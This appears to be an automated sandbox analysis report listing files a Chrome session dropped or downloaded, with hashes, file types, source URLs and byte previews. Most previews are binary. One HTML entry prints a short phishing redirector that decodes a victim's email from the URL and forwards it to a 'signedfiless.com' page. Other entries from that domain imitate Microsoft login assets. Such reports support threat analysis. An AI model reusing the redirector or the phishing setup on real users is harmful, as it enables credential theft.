                                          Preview:...........m[.H....~...1v#\..-Z...Ul.f0t.....R..%.$.2.../"2SJ.2U5.w..s.;................Si...+.n..7..i.....q.....t9.9..|.=.(....K..g%.;.c...F%/p.h.Fv......<./M.pVJ.Yi...2'.K..'Ph...T..".teG.[..R.....M..J;...~?&. L<......|..bVZ...J/...X..(..IR...gh$^@z...dG....4.....Z.!..5.fx.1.C.=.*..@._...b....4......t".....C).Ko.B.>...LK..YL.`zV.t.]8I57.E..E./.....Y1...^....o.id..r..L.=.... ..y....J.l.....%.'.|.|.[...YU.A..g....q.\....Zk.fTx.c..c....<......E.....>..b..1..y.....}4...3..9....b..)..3..d.W.T...JN...B...B..rry.?]*.V>.L....+..R........l.L..Z.].^...q..VMw.......`.<..{{.....{}8.%T.RH..m..v<|..%s..Uu....Uvw.;.~w....c.?....?...v .:.E..2......{+..*T.....p....S...IR..++1@k..mkYo...A.....M..]p_.X..............I..3..7w.]d....@.bX....z.g...|..N-K[..^(..{...^N.~..oJF..S.R.R..F..om.B.pB...<F....R...(..i[.,....d.I.F.!..U...z1..6....L....+.S.M...c....110..........H....E,O..v..|..=...H$.J..J..N.4.C..dzPI..S.B@RJ.V>..GJ."/.UEwC..Q}d.k.....)KN|bp...=..g..!.V....<%
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows icon resource - 6 icons, 16x16 with PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, 24x24 with PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                          Category:dropped
                                          Size (bytes):2279
                                          Entropy (8bit):7.354295352983905
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:7E0D59593F3377B72C29435C4B43954A
                                          SHA1:B4C5C39A6DFB460BBD2EACCEB09EC8079FB6A8E2
                                          SHA-256:62D706019A0D80173113EF70FBBEE12F286E8E221534BE788448AADA4B14C8E8
                                          SHA-512:397416A6A96A39F46F22E906A60E56067E5B7B11FB0597A733F862FC077C88D5ED31F51A82709A56F6082FB1F2F72F9A0FE0849E3DD493BB4240C265B546AAD3
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:............ .....f......... .$...|... .... .5.......00.... .j.......@@.... .....?......... .....2....PNG........IHDR................a....IDATx..1NCA.C..D@."-en.!.h..8@..9h..".....5M....h..-..l..L..P.Y.^luw...r.(.........w...B({....&.F......N.f%..........^&.x}Zu........g..7m......n?..U`....@.M8.g.-..|..S.K.!....].%.I......&.I..`...F |o;....{S....|..VL...E*....IEND.B`..PNG........IHDR..............w=.....IDATx..AJ.A.E_.5...D..$'....<.g.\...!.].!..Y....4...B.......4U...Q..J(...y....%..[t;..>\...~....O....r......e...F....8.d9....4.x.x*W..e...c...~W..P2.........[.....r<..,..>....q.\...U...v.'......!.1.....9..:8............I.I.d.......IEND.B`..PNG........IHDR... ... .....szz.....IDATx..AJC1.E.{..... .;..>\..q+.. ..N.j....."8k.P..IF...M..{.8..F..Z.q...~.y}...0.f..U....Z...@yd...4......DT.B..)......v.8.....)..Lq.[....]_jrG$...3.%......i.vU...C...h0.....rz^.].....9..5.....mU~.E..GMF.X....?..Y.U..|.c.k.v>..@.h..........Nh.u......IEND.B`..PNG........IHDR...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):219
                                          Entropy (8bit):4.891973020166299
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:1BBC8377F27C17B8B8F92D4C58206650
                                          SHA1:B13F11FABCA4F7CF3E8F693E8E55BDE77F388C68
                                          SHA-256:0A407E574325B755FFCB41F9F59C9C41449AE7BCC59DC59238DF7D15AD889F29
                                          SHA-512:A11B156E496323E5E29DE444CFAF442EBBCB0FF05620F799E858533DA17B0517F99A55108E157809DE7E6B0D722A71C54D3A43DB199D9DEA053B547CE3D848DD
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://mwtelhasecologicas.com.br/wp-includes/syandm/?utm_source=rovis-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post
                                          Preview:<script> .. ..var email = window.location.hash.substr(1);var decodedString = atob(email); window.setTimeout(function() {window.location.href = 'https://doxcs.signedfiless.com/?username=' + decodedString; }); ..</script>
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 113697
                                          Category:downloaded
                                          Size (bytes):35840
                                          Entropy (8bit):7.99272225932518
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:12F5585257FCEDB13227ABF578A246EC
                                          SHA1:C895DC3AE2291D5BB6FB5C8940CBF4DBED86A565
                                          SHA-256:8BE19EA62F9322A88920B4440242588D05558A32C44CE212C749FC4A15495A0A
                                          SHA-512:B85F0CB04C2AB3C53BE1A31E945657DD6D66CB0D2094A83AFEE730CA6C11D4744108F3E3AA501FBAE3B76E5D0E0EC1440EBC1DAE87AC0364B61C53E40234E630
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://acf7658e-c32a1353.signedfiless.com/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_ea3e62a2bdfb2b2ee8c8.js
                                          Preview:...........{..8.(.........,.-.......gglu.. .m..I....~..oRv......i.(....P(......k............o.6>.|..d..........O...V..}.G..4......9.l..F.mDI.f.4...o,..EA.1...F1g..,...E..Gy...,No6.@..l....n..;....P.fQ...ty...b#I.(d.A2!j1$..m....6n.Q8.x..Y...b#c!....|.p..w#..F..i..s.Gc..b..9U.k......&@pJ..'40J......e.$.k.L(b...F.n.+..nO..6@n...A.&.,LVa......Y......V..o..% ....,......:..e.-XR. <FE.w..b..P......r.b.["~..!.....y.......V...4.;M..Y.X.{.......<.%l.c&..a....Y.....Z:............6.....I...DV...WVW..]...B...D..r....w..\.._..(...a.e.^.........GNc......v..~...{.U.b...-...z.d........*..sH..C..u^,.M...2....8c.e...t..e..`........Y.J.:...TS?i..E~.ei.F.W.5i|..d.q...0..w........:_......B.H.GK5.>..x....G.@......gW.(c..w.j.2V.....Q.....a.=Y....A.,..EZ..v....T..)....K.A.......&.....*.V0..BH.,..E..b.:.B...4.\.A...F...8.w..!......)..Y.<NQ......9O.........V...o ?A.CTR....?R..U........j.j%\%...R..E.G...W....N?-.;Y....(.....~.8h...$$."...M"0~.P.!.6.Z.7.C.../d.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, original size modulo 2^32 3651
                                          Category:downloaded
                                          Size (bytes):1435
                                          Entropy (8bit):7.860223690068481
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:DF6A7721C242813411CC6950DF40F9B3
                                          SHA1:B2068C4A65C183AAD6FC22A44CC1FA449CD355B4
                                          SHA-256:AA53B6DC744357B392FC57C34E516BAE465D4A6837775C137A176D599C8EA948
                                          SHA-512:CDCFB686649F2061FE13A58841EB6A4E17F40951BA0C440C568B248E6128B6E0C4E79F95DC3EAB81286C103ED2A966F7058D22066466ADED482BF9ECAA6EA3CB
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://acf7658e-c32a1353.signedfiless.com/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                          Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                          No static file info